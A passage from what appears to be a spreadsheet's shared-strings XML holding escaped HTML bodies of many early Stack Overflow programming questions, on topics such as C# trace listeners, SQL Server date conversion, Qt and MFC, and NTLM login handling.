    <t xml:space="preserve">&lt;p&gt;I want to introduce some tracing to a C# application I am writing. Sadly, I can never really remember how it works and would like a tutorial with reference qualities to check up on every now and then. It should include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;App.config / Web.config stuff to add for registering TraceListeners&lt;/li&gt;
&lt;li&gt;how to set it up in the calling application&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Do you know the uber tutorial that we should link to?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Glenn Slaven pointed me in the right direction. Add this to your App.config/Web.config inside &lt;code&gt;&amp;lt;configuration/&amp;gt;&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;system.diagnostics&amp;gt;
    &amp;lt;trace autoflush="true"&amp;gt;
      &amp;lt;listeners&amp;gt;
        &amp;lt;add type="System.Diagnostics.TextWriterTraceListener" name="TextWriter"
             initializeData="trace.log" /&amp;gt;
      &amp;lt;/listeners&amp;gt;
    &amp;lt;/trace&amp;gt;
&amp;lt;/system.diagnostics&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will add a &lt;code&gt;TextWriterTraceListener&lt;/code&gt; that will catch everything you send to with &lt;code&gt;Trace.WriteLine&lt;/code&gt; etc.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; @DanEsparza pointed out that you should use &lt;code&gt;Trace.TraceInformation&lt;/code&gt;, &lt;code&gt;Trace.TraceWarning&lt;/code&gt; and &lt;code&gt;Trace.TraceError&lt;/code&gt; instead of &lt;code&gt;Trace.WriteLine&lt;/code&gt;, as they allow you to format messages the same way as &lt;code&gt;string.Format&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tip:&lt;/strong&gt; If you don't add any listeners, then you can still see the trace output with the SysInternals program DebugView (&lt;code&gt;Dbgview.exe&lt;/code&gt;): &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb896647.aspx"&gt;http://technet.microsoft.com/en-us/sysinternals/bb896647.aspx&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Integrating Qt into legacy MFC applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We currently maintain a suit of MFC applications that are fairly well designed, however the user interface is beginning to look tired and a lot of the code is in need quite a bit of refactoring to tidy up some duplication and/or performance problems.  We make use of quite a few custom controls that handle all their own drawing (all written using MFC).&lt;/p&gt;
&lt;p&gt;Recently I've been doing more research into Qt and the benefits it provides (cross-platform and supports what you might call a more "professional" looking framework for UI development).&lt;/p&gt;
&lt;p&gt;My question is - &lt;strong&gt;what would be the best approach to perhaps moving to the Qt framework&lt;/strong&gt;?  Does Qt play nice with MFC?  Would it be better to start porting some of our custom controls to Qt and gradually integrate more and more into our existing MFC apps? (is this possible?).&lt;/p&gt;
&lt;p&gt;Any advice or previous experience is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Microsoft .Net framework 3.5 SP1 Setup Fails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my Vista machine I cannot install the .Net framework 3.5 SP1. Setup ends few moments after ending the download of the required files, stating in the log that: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[08/26/08,09:46:11] Microsoft .NET Framework 2.0SP1 (CBS): [2] Error: Installation failed for component Microsoft .NET Framework 2.0SP1 (CBS). MSI returned error code 1
[08/26/08,09:46:13] WapUI: [2] DepCheck indicates Microsoft .NET Framework 2.0SP1 (CBS) is not installed.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;First thing I did was trying to install 2.0 SP1, but this time setup states that the "product is not supported on Vista system". Uhm.&lt;/p&gt;
&lt;p&gt;The real big problem is that this setup fails also when it is called by the Visual Studio 2008 SP1.&lt;/p&gt;
&lt;p&gt;Now, I searched the net for this, but I'm not finding a real solution... Any idea / hint? Did anybody have problems during SP1 install?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ : Opening a file in non exclusive mode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to develop an application which parses a log file and sends specific data to a server. It has to run on both Linux and Windows. &lt;/p&gt;
&lt;p&gt;The problem appears when I want to test the log rolling system (which appends .1 to the name of the creates a new one with the same name). On Windows (haven't tested yet on Linux) I can't rename a file that I have opened with std::ifstream() (exclusive access?) even if I open it in "input mode" (ios::in).&lt;/p&gt;
&lt;p&gt;Is there a cross-platform way to open file in a non-exclusive way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are models for storing tree structures and what are their characteristics?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So far I have encountered adjacency list, nested sets and nested intervals as models for storing tree structures in a database. I know these well enough and have migrated trees from one to another.&lt;/p&gt;
&lt;p&gt;What are other popular models? What are their characteristics? What are good resources (books, web, etc) on this topic?&lt;/p&gt;
&lt;p&gt;I'm not only looking for db storage but would like to expand my knowledge on trees in general. For example, I understand that nested sets/intervals are especially favorable for relational database storage and have asked myself, are they actually a &lt;i&gt;bad&lt;/i&gt; choice in other contexts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finding a DOI in a document or page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The &lt;a href="http://doi.org/"&gt;DOI&lt;/a&gt; system places basically no useful limitations on what constitutes &lt;a href="http://doi.org/handbook_2000/enumeration.html#2.2"&gt;a reasonable identifier&lt;/a&gt;. However, being able to pull DOIs out of PDFs, web pages, etc. is quite useful for citation information, etc.&lt;/p&gt;
&lt;p&gt;Is there a reliable way to identify a DOI in a block of text without assuming the 'doi:' prefix? (any language acceptable, regexes preferred, and avoiding false positives a must)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How bad is dynamic casting?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We often hear/read that one should avoid dynamic casting. I was wondering what would be 'good use' examples of it, according to you?&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;Yes, I'm aware of &lt;a href="http://stackoverflow.com/questions/28002/regular-cast-vs-staticcast-vs-dynamiccast"&gt;that other thread&lt;/a&gt;: it is indeed when reading one of the first answers there that I asked my question!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server DateTime conversion failure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a large table with 1 million+ records. Unfortunately, the person who created the table decided to put dates in a &lt;code&gt;varchar(50)&lt;/code&gt; field.&lt;/p&gt;
&lt;p&gt;I need to do a simple date comparison -&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;datediff(dd, convert(datetime, lastUpdate, 100), getDate()) &amp;lt; 31
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it fails on the &lt;code&gt;convert()&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Conversion failed when converting datetime from character string.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Apparently there is something in that field it doesn't like, and since there are so many records, I can't tell just by looking at it. How can I properly sanitize the entire date field so it does not fail on the &lt;code&gt;convert()&lt;/code&gt;? Here is what I have now:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select count(*)
from MyTable
where
    isdate(lastUpdate) &amp;gt; 0
    and datediff(dd, convert(datetime, lastUpdate, 100), getDate()) &amp;lt; 31
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/28110/ms-sql-datetime-conversion-failure#28209"&gt;@SQLMenace&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I'm not concerned about performance in this case. This is going to be a one time query. Changing the table to a datetime field is not an option.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/28110/ms-sql-datetime-conversion-failure#28139"&gt;@Jon Limjap&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I've tried adding the third argument, and it makes no difference.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/28110/ms-sql-datetime-conversion-failure#28209"&gt;@SQLMenace&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The problem is most likely how the data is stored, there are only two safe formats; ISO YYYYMMDD; ISO 8601 yyyy-mm-dd Thh:mm:ss:mmm (no spaces)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Wouldn't the &lt;code&gt;isdate()&lt;/code&gt; check take care of this?&lt;/p&gt;
&lt;p&gt;I don't have a need for 100% accuracy. I just want to get most of the records that are from the last 30 days.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/28110/ms-sql-datetime-conversion-failure#28209"&gt;@SQLMenace&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select isdate('20080131') -- returns 1
select isdate('01312008') -- returns 0
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/28110/ms-sql-datetime-conversion-failure#28209"&gt;@Brian Schkerke&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Place the CASE and ISDATE inside the CONVERT() function.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Thanks! That did it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Create an Attribute to Break the Build</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;OK, this kind of follows on from &lt;a href="http://stackoverflow.com/questions/27758/notify-developer-of-a-do-not-use-method" rel="nofollow"&gt;my previous question&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What I would really like to do is create some sort of attribute which allows me to decorate a method that will &lt;strong&gt;break the build&lt;/strong&gt;. Much like the &lt;em&gt;Obsolete("reason", true)&lt;/em&gt; attribute, but without falsely identifying obsolete code.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To clarify&lt;/strong&gt;: I dont want it to break the build on &lt;em&gt;ANY&lt;/em&gt; F6 (Build) press, I only want it to break the build if a method decorated with the attribute is called somewhere else in the code. Like I said, &lt;em&gt;similar&lt;/em&gt; to obsolete, but not the same.&lt;/p&gt;
&lt;p&gt;I know I am not alone in this, since &lt;a href="http://stackoverflow.com/questions/27758/notify-developer-of-a-do-not-use-method#27796" rel="nofollow"&gt;other users want to use it for other reasons&lt;/a&gt;. I have never created custom attributes before so it is all new to me!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multiple classes in a header file vs. a single header file per class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For whatever reason, our company has a coding guideline that states:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Each class shall have it's own header and implementation file.&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;So if we wrote a class called &lt;code&gt;MyString&lt;/code&gt; we would need an associated &lt;strong&gt;MyStringh.h&lt;/strong&gt; and &lt;strong&gt;MyString.cxx&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Does anyone else do this?  Has anyone seen any compiling performance repercussions as a result?  Does 5000 classes in 10000 files compile just as quickly as 5000 classes in 2500 files?  If not, is the difference noticeable?&lt;/p&gt;
&lt;p&gt;[We code C++ and use GCC 3.4.4 as our everyday compiler]&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I maintain state between calls to a SQL Server UDF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SQL script that inserts data (via INSERT statements currently numbering in the thousands) One of the columns contains a unique identifier (though not an IDENTITY type, just a plain ol' int) that's actually unique across a few different tables. &lt;/p&gt;
&lt;p&gt;I'd like to add a scalar function to my script that gets the next available ID (i.e. last used ID + 1) but I'm not sure this is possible because there doesn't seem to be a way to use a global or static variable from within a UDF, I can't use a temp table, and I can't update a permanent table from within a function. &lt;/p&gt;
&lt;p&gt;Currently my script looks like this: &lt;/p&gt;
&lt;pre&gt;
   declare @v_baseID int 
   exec dbo.getNextID @v_baseID out  --sproc to get the next available id
   --Lots of these - where n is a hardcoded value
   insert into tableOfStuff (someStuff, uniqueID) values ('stuff', @v_baseID + n ) 
   exec dbo.UpdateNextID @v_baseID + lastUsedn  --sproc to update the last used id
&lt;/pre&gt;
&lt;p&gt;But I would like it to look like this: &lt;/p&gt;
&lt;pre&gt;
   --Lots of these
   insert into tableOfStuff (someStuff, uniqueID) values ('stuff', getNextID() ) 
&lt;/pre&gt;
&lt;p&gt;Hardcoding the offset is a pain in the arse, and is error prone.  Packaging it up into a simple scalar function is very appealing, but I'm starting to think it can't be done that way since there doesn't seem to be a way to maintain the offset counter between calls.  Is that right, or is there something I'm missing.  &lt;/p&gt;
&lt;p&gt;We're using SQL Server 2005 at the moment. &lt;/p&gt;
&lt;p&gt;&lt;em&gt;edits for clarification:&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Two users hitting it won't happen.  This is an upgrade script that will be run only once, and never concurrently. &lt;/p&gt;
&lt;p&gt;The actual sproc isn't prefixed with sp_, fixed the example code. &lt;/p&gt;
&lt;p&gt;In normal usage, we do use an id table and a sproc to get IDs as needed, I was just looking for a cleaner way to do it in this script, which essentially just dumps a bunch of data into the db. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Proxy which requires authentication with Android Emulator</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anybody managed to get the Android Emulator working behind a proxy which requires authentication?&lt;/p&gt;
&lt;p&gt;I've tried setting the -http-proxy argument to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://DOMAIN/USERNAME:PASSWORD@IP:PORT
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but am having no success. &lt;/p&gt;
&lt;p&gt;I've tried following the docs to no avail. I've also tried the &lt;code&gt;-verbose-proxy&lt;/code&gt; setting but this no longer seems to exist.&lt;/p&gt;
&lt;p&gt;Any pointers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Corporate-Friendly Open Source Licenses</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What open source licenses are more corporate-friendly, i.e., they can be used in commercial products without the need to open source the commercial product?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to use nHibernate with Paradox database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to configure nHibernate to connect to Paradox database (&lt;code&gt;*.db&lt;/code&gt; files)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is it bad practice to make multiple database connections in one request?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A discussion about Singletons in &lt;strong&gt;PHP&lt;/strong&gt; has me thinking about this issue more and more. Most people instruct that you shouldn't make a bunch of DB connections in one request, and I'm just curious as to what your reasoning is. My first thought is the expense to your script of making that many requests to the DB, but then I counter myself with the question: wouldn't multiple connections make concurrent querying more efficient?&lt;/p&gt;
&lt;p&gt;How about some answers (with evidence, folks) from some people in the know?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Mobile - What scripting platforms are available?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a number of users with Windows Mobile 6 and need to apply minor changes. eg. update a registry setting. One option is push and execute an executable file using our device management software.&lt;/p&gt;
&lt;p&gt;I'd like this to be a little more friendly for the admins who are familiar with scripting in VBScript/JScript etc. What are the options for scripting on Windows Mobile devices?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scrum - How to get better input from the functional/commercial team</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are a small team of 3 developers (2 experienced but new to  this particular business sector) developing a functionally complex product.  We're using Scrum and have a demo at the end of each sprint.  Its clear that the functional team have plenty of ideas but these are not well communicated to the development team and the demo poses more questions than answers. &lt;/p&gt;
&lt;p&gt;Have you any recommendations for improving the the quality of input from the functional people?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Further info:&lt;/strong&gt; I think part of the problem is that there are no &lt;em&gt;specs&lt;/em&gt; or  User Stories as such.  Personally I think they need to be writing down some sort of requirements - what sort of things should they be writing down and to what complexity given its an agile process?&lt;/p&gt;
&lt;p&gt;TIA&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Guide to choosing between REST vs SOAP services?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have links to documentation or guides on making the decision between REST vs. SOAP? I understand both of these but am looking for some references on the key decision points, eg, security, which may make you lean towards one or the other.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SharePoint SPContext.List in a custom application page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom SharePoint application page deployed to the _layouts folder.  It's a custom "new form" for a custom content type.  During my interactions with this page, I will need to add an item to my list.  When the page first loads, I can use SPContext.Current.List to see the current list I'm working with.  But after I fill in my form and the form posts back onto itself and IsPostBack is true, then SPContext.Current.List is null so I can't find the list that I need to add my stuff into.&lt;/p&gt;
&lt;p&gt;Is this expected?&lt;/p&gt;
&lt;p&gt;How should I retain some info about my context list across the postback?  Should I just populate some asp:hidden control with my list's guid and then just pull it back from that on the postback?  That seems safe, I guess.&lt;/p&gt;
&lt;p&gt;FWIW, this is the MOSS 2007 Standard version.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq To SQL: Can I eager load only one field in a joined table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have one table "orders" with a foreing key "ProductID".&lt;/p&gt;
&lt;p&gt;I want to show the orders in a grid with the &lt;strong&gt;product name&lt;/strong&gt;, without &lt;strong&gt;LazyLoad&lt;/strong&gt; for better performance, but I if use &lt;strong&gt;DataLoadOptions&lt;/strong&gt; it retrieves &lt;strong&gt;all&lt;/strong&gt; Product fields, which seams like a &lt;strong&gt;overkill&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Is there a way to retrieve &lt;strong&gt;only&lt;/strong&gt; the Product name in the first query?
Can I set some attribute in the DBML?&lt;/p&gt;
&lt;p&gt;In this &lt;a href="http://visualstudiomagazine.com/listings/list.aspx?id=566" rel="nofollow"&gt;table&lt;/a&gt; says that "Foreign-key values" are "Visible" in Linq To SQL, but don't know what this means.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Changed the title, because I'm not really sure the there is no solution.&lt;br /&gt;
Can't believe no one has the same problem, it is a very common scenario.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How are you generating tests from specifications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I came across a printed &lt;a href="http://www.eiffel.com/general/column/2008/02.html" rel="nofollow"&gt;article by Bertrand Meyer&lt;/a&gt; where he states that tests can be generated from specifications. My development team does nothing like this, but it sounds like a good technique to consider. How are you generating tests from specifications? How would you describe the success your having in discovering program faults via this method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL1159 Initialization error with DB2 .NET Data Provider, reason code 7, tokens 9.5.0.DEF.2, SOFTWARE\IBM\DB2\InstalledCopies</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to get the DB2 data provider from a 32-bit .Net application to connect to DB2 running as a 32-bit application on Vista 64 (is that confusing enough yet)?  Unfortunately, I am getting the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;SQL1159 Initialization error with DB2 .NET Data Provider, reason code 7, tokens 9.5.0.DEF.2, SOFTWARE\IBM\DB2\InstalledCopies&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There are several &lt;a href="http://www-128.ibm.com/developerworks/forums/thread.jspa?threadID=207638&amp;amp;tstart=45" rel="nofollow"&gt;IBM forum posts&lt;/a&gt; mentioning it, but little useful guidance.  Has anyone experienced this before?  Or do you have better ideas for fixing it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stop the taskbar flashing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know I can programatically make the taskbar item for a particular window start flashing when something changes, but is there any way I can stop it from flashing either programatically after a certain period of time or at least is there a keyboard shortcur I can give to my users to somehow stop the flashing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is pagination so resource-expensive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's one of those things that seems to have an odd curve where the more I think about it, the more it makes sense.  To a certain extent, of course.  And then it doesn't make sense to me at all.&lt;/p&gt;
&lt;p&gt;Care to enlighten me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to package and distribute an Excel application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've writen an Excel-based, database reporting tool. Currentely, all the VBA code is associated with a single XLS file. The user generates the report by clicking a button on the toolbar. Unfortunately, unless the user has saved the file under another file name, all the reported data gets wiped-out.&lt;/p&gt;
&lt;p&gt;When I have created similar tools in Word, I can put all the code in a template (.dot) file and call it from there. If I put the template file in the Office startup folder, it will launch everytime I start Word. Is there a similar way, to package and distribute my code in Excel? I've tried using Add-ins, but I didn't find a way to call the code from the application window.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Suppress NTLM dialog box after unauthorized request</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a recent sharepoint project, I implemented an authentication webpart which should replace the NTLM authentication dialog box. It works fine as long as the user provides valid credentials. Whenever the user provides invalid credentials, the NTLM dialog box pops up in Internet Explorer.&lt;/p&gt;
&lt;p&gt;My Javascript code which does the authentication via XmlHttpRequest looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function Login() {
   var request = GetRequest(); // retrieves XmlHttpRequest
   request.onreadystatechange = function() {
      if (this.status == 401) {     // unauthorized request -&amp;gt; invalid credentials
         // do something to suppress NTLM dialog box...
         // already tried location.reload(); and window.location = &amp;lt;url to authentication form&amp;gt;;
      }
   }
   request.open("GET", "http://myServer", false, "domain\\username", "password");
   request.send(null);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't want the NTLM dialog box to be displayed when the user provides invalid credentials. Instead the postback by the login button in the authentication form should be executed. In other words, the browser should not find out about my unauthorized request.&lt;/p&gt;
&lt;p&gt;Is there any way to do this via Javascript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can someone point me to some guides for WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having trouble finding good guides for WPF.&lt;br /&gt;
I have experience in C# and .NET but  I don't know anything about WPF except for the regular marketing-ish description of the technology as a whole.&lt;br /&gt;
Can anyone point me to a good beginner's tutorial/guide on WPF.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stopping MSI from launching an EXE in the SYSTEM context</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a problem here with an MSI deployment that I'm working on (using &lt;a href="http://en.wikipedia.org/wiki/InstallShield" rel="nofollow"&gt;InstallShield&lt;/a&gt;). We have a program running in the background that needs to run per-user, and it needs to start automatically without user intervention.&lt;/p&gt;
&lt;p&gt;The problem is with &lt;a href="http://en.wikipedia.org/wiki/Group_Policy#Operation" rel="nofollow"&gt;Group Policy Object&lt;/a&gt;/&lt;a href="http://en.wikipedia.org/wiki/Active_Directory" rel="nofollow"&gt;Active Directory&lt;/a&gt; (GPO/AD) deployment the application is started in the SYSTEM context before anyone is logged in rather than as the user who is about to log in. The application can only run once per user, and it seems that the SYSTEM process prevents the USER process from starting. This means the PCs need to be rebooted twice before the software can be deployed to the users. How do we to stop this?&lt;/p&gt;
&lt;p&gt;Basically the current workflow is: &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Installation/upgrade runs... kill background application&lt;/li&gt;
&lt;li&gt;Install new files&lt;/li&gt;
&lt;li&gt;Startup background application&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This works for published applications and interactive &lt;a href="http://en.wikipedia.org/wiki/Windows_Installer" rel="nofollow"&gt;MSI&lt;/a&gt; installations - it's only 'assigned' applications that seem to have the problem. As step 3 happens in the SYSTEM context rather than the user context :(&lt;/p&gt;
&lt;p&gt;Ideally, I'd have the development team patch the EXE file to prevent launching in the SYSTEM context, but that's a release cycle away, and I'm looking for an installer-based solution for the interim.&lt;/p&gt;
&lt;p&gt;(I don't know Installscript... So I'm guessing &lt;a href="http://en.wikipedia.org/wiki/VBScript" rel="nofollow"&gt;VBScript&lt;/a&gt; is probably the way to go if there's no native InstallShield stuff I can use.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is version control (ie. Subversion) applicable in document tracking?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in charge of about 100+ documents (word document, not source code) that needs revision by different people in my department. Currently all the documents are in a shared folder where they will retrieve, revise and save back into the folder. &lt;/p&gt;
&lt;p&gt;What I am doing now is looking up the "date modified" in the shared folder, opened up recent modified documents and use the "Track Change" function in MS Word to apply the changes. I find this a bit tedious.&lt;/p&gt;
&lt;p&gt;So will it be better and easier if I commit this in a version control database?&lt;/p&gt;
&lt;p&gt;Basically I want to keep different version of a file.&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;
What have I learn from answers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Use Time Machine to save different
version (or Shadow copy in Vista)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;There is a difference between text
and binary documents when you use
version control app. (I didn't know
that)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Diff won't work on binary files&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;A notification system (ie email) for revision is great&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Google Docs revision feature.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt; : &lt;/p&gt;
&lt;p&gt;I played around with Google Docs revision feature and feel that it is almost right for me. Just a bit annoyed with the too frequent versioning (autosaving). &lt;/p&gt;
&lt;p&gt;But what feels right for me doesn't mean it feels right for my dept. Will they be okay with saving all these documents with Google? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java return copy to hide future changes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Java, say you have a class that wraps an &lt;code&gt;ArrayList&lt;/code&gt; (or any collection) of objects. &lt;/p&gt;
&lt;p&gt;How would you return one of those objects such that the caller will not see any future changes to the object made in the ArrayList? &lt;/p&gt;
&lt;p&gt;i.e. you want to return a deep copy of the object, but you don't know if it is cloneable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to bring in a web app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I run a game and the running is done by hand, I have a few scripts that help me but essentially it's me doing the work. I am at the moment working on web app that will allow the users to input directly some of their game actions and thus save me a lot of work.&lt;/p&gt;
&lt;p&gt;The problem is that I'm one man working on a moderately sized (upwards of 20 tables) project, the workload isn't the issue, it's that bugs will have slipped in even though I test as I write. So my question is thus two-fold.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Beta testing, I love open beta's but would a closed beta be somehow more effective and give better results?&lt;/li&gt;
&lt;li&gt;How should I bring in the app? Should I one turn drop it in and declare it's being used or should I use it alongside the normal construct of the game?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>How to get your own (local) IP-Address from an udp-socket (C/C++)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ol&gt;
&lt;li&gt;You have multiple network adapters.&lt;/li&gt;
&lt;li&gt;Bind a UDP socket to an local port, without specifying an address.&lt;/li&gt;
&lt;li&gt;Receive packets on one of the adapters.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;How do you get the local ip address of the adapter which received the packet?&lt;/p&gt;
&lt;p&gt;The question is, "What is the ip address from the receiver adapter?" not the address from the sender which we get in the &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;receive_from( ..., &amp;amp;senderAddr, ... );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;call.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I test a method that populates a list from a DataReader?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I'm working on some legacy code that's heavy on the manual database operations. I'm trying to maintain some semblance of quality here, so I'm going TDD as much as possible.&lt;/p&gt;
&lt;p&gt;The code I'm working on needs to populate, let's say a &lt;code&gt;List&amp;lt;Foo&amp;gt;&lt;/code&gt; from a DataReader that returns all the fields required for a functioning Foo. However, if I want to verify that the code in fact returns one list item per one database row, I'm writing test code that looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Expect.Call(reader.Read()).Return(true);
Expect.Call(reader["foo_id"]).Return((long) 1);
// ....
Expect.Call(reader.Read()).Return(true);
Expect.Call(reader["foo_id"]).Return((long) 2);
// ....
Expect.Call(reader.Read()).Return(false);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which is rather tedious and rather easily broken, too. &lt;/p&gt;
&lt;p&gt;How should I be approaching this issue so that the result won't be a huge mess of brittle tests?&lt;/p&gt;
&lt;p&gt;Btw I'm currently using Rhino.Mocks for this, but I can change it if the result is convincing enough. Just as long as the alternative isn't TypeMock, because their EULA was a bit too scary for my tastes last I checked.&lt;/p&gt;
&lt;p&gt;Edit: I'm also currently limited to C# 2.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to know if a line intersects a plane in C#? - Basic 2D geometry</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;my school maths are very rusty and I think this is a good opportunity to take advance of this community :D&lt;/p&gt;
&lt;p&gt;I have two points (a line) and a rectangle, I would like to know how to calculate if the line intersects the rectangle, my first approach had so many "if" statements that the compiler sent me a link to this site.&lt;/p&gt;
&lt;p&gt;Thanks for your time!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Java Console/Editor similar to the GroovyConsole?</t>
  </si>
  <si>
